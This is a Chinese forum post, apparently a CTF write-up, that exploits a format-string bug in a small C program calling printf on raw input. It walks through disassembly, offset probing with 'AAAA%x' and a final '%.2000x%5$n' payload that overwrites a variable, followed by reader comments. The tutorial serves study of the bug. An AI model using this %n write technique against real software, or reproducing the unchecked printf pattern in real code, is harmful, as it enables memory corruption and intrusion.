某道 Pwn(格式化字符串漏洞)

本贴最后更新于 3114 天前,其中的信息可能已经天翻地覆

格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。

首先看这一段代码,什么比赛的题我忘了:

#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag == 2000) { printf("good!!\n"); } return 0; }

目标是拿到 Flag。我们使用 GCC 编译之后用 ObjDump 反编译:

8048507: c7 45 88 00 00 00 00 movl $0x0,-0x78(%ebp) ;flag 804850e: 8d 45 88 lea -0x78(%ebp),%eax 8048511: 89 45 8c mov %eax,-0x74(%ebp) ;p 8048514: 83 ec 08 sub $0x8,%esp 8048517: 8d 45 90 lea -0x70(%ebp),%eax ;a 804851a: 50 push %eax 804851b: 68 f0 85 04 08 push $0x80485f0 8048520: e8 bb fe ff ff call 80483e0 <__isoc99_scanf@plt> 8048525: 83 c4 10 add $0x10,%esp

我们可以看到 pflag 下面四个偏移,a 又在 p 下面四个偏移,用缓冲区溢出是不可能了。下面有个 printf,也许可以利用字符串格式化漏洞。

继续往下看汇编:

8048528: 83 ec 0c sub $0xc,%esp 804852b: 8d 45 90 lea -0x70(%ebp),%eax 804852e: 50 push %eax 804852f: e8 5c fe ff ff call 8048390 <printf@plt> 8048534: 83 c4 10 add $0x10,%esp

我们可以看到 printf 总共接受了 4 个参数,实际上只有一个有效参数。

我们可以使用 AAAA%x 来寻找 a 的偏移:

wizard@ubuntu:~/Desktop$ ./t2 AAAA%x AAAAffee9b78wizard@ubuntu:~/Desktop$ ./t2 AAAA%2$x AAAAf767e329wizard@ubuntu:~/Desktop$ ./t2 AAAA%4$x AAAA0wizard@ubuntu:~/Desktop$ ./t2 AAAA%5$x AAAAfff44cd0wizard@ubuntu:~/Desktop$ AAAA%6$x AAAA41414141

我们看到了一个 0 ,又看到了一个很像地址的东西。然后就是我们输入的 AAAA。我们于是可以断定,第四个 %xflag,第五个 %xp,第六个 %xa 的起始位置。

再试一下,发现栈基址是变化的:

wizard@ubuntu:~/Desktop$ ./t2 AAAA%5$x AAAAffad7a70

也就是说,我们不能把 f 的地址写进 a 的前四个字节,但是我们可以利用 p。构造字符串 "%.2000%x%5$n"

ffe43b880wizard@ubuntu:~/Desktop$ ./t2 %.2000x%5$n ... 0000000000000000000000000000000000000ffce9f98good!!

成功。

相关帖子

欢迎来到这里!

我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。

注册 关于
请输入回帖内容 ...
  • wizardforcel
    作者

    所以为什么 ASM 的代码段这么难看 @88250

    1 回复
  • 88250

    估计把 asm 标识去掉就好了

  • anarkh via macOS

    小白求问 printf(a)编译会报 format string is not a string literal 错误怎么解决啊

推荐标签 标签

  • Node.js

    Node.js 是一个基于 Chrome JavaScript 运行时建立的平台, 用于方便地搭建响应速度快、易于扩展的网络应用。Node.js 使用事件驱动, 非阻塞 I/O 模型而得以轻量和高效。

    139 引用 • 269 回帖 • 3 关注
  • 支付宝

    支付宝是全球领先的独立第三方支付平台,致力于为广大用户提供安全快速的电子支付/网上支付/安全支付/手机支付体验,及转账收款/水电煤缴费/信用卡还款/AA 收款等生活服务应用。

    29 引用 • 347 回帖 • 2 关注
  • 锤子科技

    锤子科技(Smartisan)成立于 2012 年 5 月,是一家制造移动互联网终端设备的公司,公司的使命是用完美主义的工匠精神,打造用户体验一流的数码消费类产品(智能手机为主),改善人们的生活质量。

    4 引用 • 31 回帖 • 1 关注
  • InfluxDB

    InfluxDB 是一个开源的没有外部依赖的时间序列数据库。适用于记录度量,事件及实时分析。

    2 引用 • 104 关注
  • 周末

    星期六到星期天晚,实行五天工作制后,指每周的最后两天。再过几年可能就是三天了。

    14 引用 • 297 回帖
  • SendCloud

    SendCloud 由搜狐武汉研发中心孵化的项目,是致力于为开发者提供高质量的触发邮件服务的云端邮件发送平台,为开发者提供便利的 API 接口来调用服务,让邮件准确迅速到达用户收件箱并获得强大的追踪数据。

    2 引用 • 8 回帖 • 506 关注
  • RIP

    愿逝者安息!

    8 引用 • 92 回帖 • 409 关注
  • golang

    Go 语言是 Google 推出的一种全新的编程语言,可以在不损失应用程序性能的情况下降低代码的复杂性。谷歌首席软件工程师罗布派克(Rob Pike)说:我们之所以开发 Go,是因为过去 10 多年间软件开发的难度令人沮丧。Go 是谷歌 2009 发布的第二款编程语言。

    500 引用 • 1396 回帖 • 253 关注
  • 七牛云

    七牛云是国内领先的企业级公有云服务商,致力于打造以数据为核心的场景化 PaaS 服务。围绕富媒体场景,七牛先后推出了对象存储,融合 CDN 加速,数据通用处理,内容反垃圾服务,以及直播云服务等。

    29 引用 • 230 回帖 • 122 关注
  • 数据库

    据说 99% 的性能瓶颈都在数据库。

    346 引用 • 757 回帖
  • wolai

    我来 wolai:不仅仅是未来的云端笔记!

    2 引用 • 14 回帖 • 2 关注
  • Git

    Git 是 Linux Torvalds 为了帮助管理 Linux 内核开发而开发的一个开放源码的版本控制软件。

    211 引用 • 358 回帖 • 2 关注
  • 开源

    Open Source, Open Mind, Open Sight, Open Future!

    415 引用 • 3596 回帖
  • TensorFlow

    TensorFlow 是一个采用数据流图(data flow graphs),用于数值计算的开源软件库。节点(Nodes)在图中表示数学操作,图中的线(edges)则表示在节点间相互联系的多维数据数组,即张量(tensor)。

    20 引用 • 19 回帖 • 1 关注
  • Outlook
    1 引用 • 5 回帖 • 3 关注
  • Latke

    Latke 是一款以 JSON 为主的 Java Web 框架。

    71 引用 • 535 回帖 • 830 关注
  • Hibernate

    Hibernate 是一个开放源代码的对象关系映射框架,它对 JDBC 进行了非常轻量级的对象封装,使得 Java 程序员可以随心所欲的使用对象编程思维来操纵数据库。

    39 引用 • 103 回帖 • 726 关注
  • Pipe

    Pipe 是一款小而美的开源博客平台。Pipe 有着非常活跃的社区,可将文章作为帖子推送到社区,来自社区的回帖将作为博客评论进行联动(具体细节请浏览 B3log 构思 - 分布式社区网络)。

    这是一种全新的网络社区体验,让热爱记录和分享的你不再感到孤单!

    134 引用 • 1127 回帖 • 109 关注
  • 小说

    小说是以刻画人物形象为中心,通过完整的故事情节和环境描写来反映社会生活的文学体裁。

    32 引用 • 108 回帖 • 1 关注
  • danl
    179 关注
  • 以太坊

    以太坊(Ethereum)并不是一个机构,而是一款能够在区块链上实现智能合约、开源的底层系统。以太坊是一个平台和一种编程语言 Solidity,使开发人员能够建立和发布下一代去中心化应用。 以太坊可以用来编程、分散、担保和交易任何事物:投票、域名、金融交易所、众筹、公司管理、合同和知识产权等等。

    34 引用 • 367 回帖 • 1 关注
  • 友情链接

    确认过眼神后的灵魂连接,站在链在!

    24 引用 • 373 回帖 • 1 关注
  • App

    App(应用程序,Application 的缩写)一般指手机软件。

    91 引用 • 384 回帖
  • 安装

    你若安好,便是晴天。

    132 引用 • 1184 回帖 • 2 关注
  • Postman

    Postman 是一款简单好用的 HTTP API 调试工具。

    4 引用 • 3 回帖
  • 学习

    “梦想从学习开始,事业从实践起步” —— 习近平

    172 引用 • 540 回帖
  • Ant-Design

    Ant Design 是服务于企业级产品的设计体系,基于确定和自然的设计价值观上的模块化解决方案,让设计者和开发者专注于更好的用户体验。

    17 引用 • 23 回帖 • 3 关注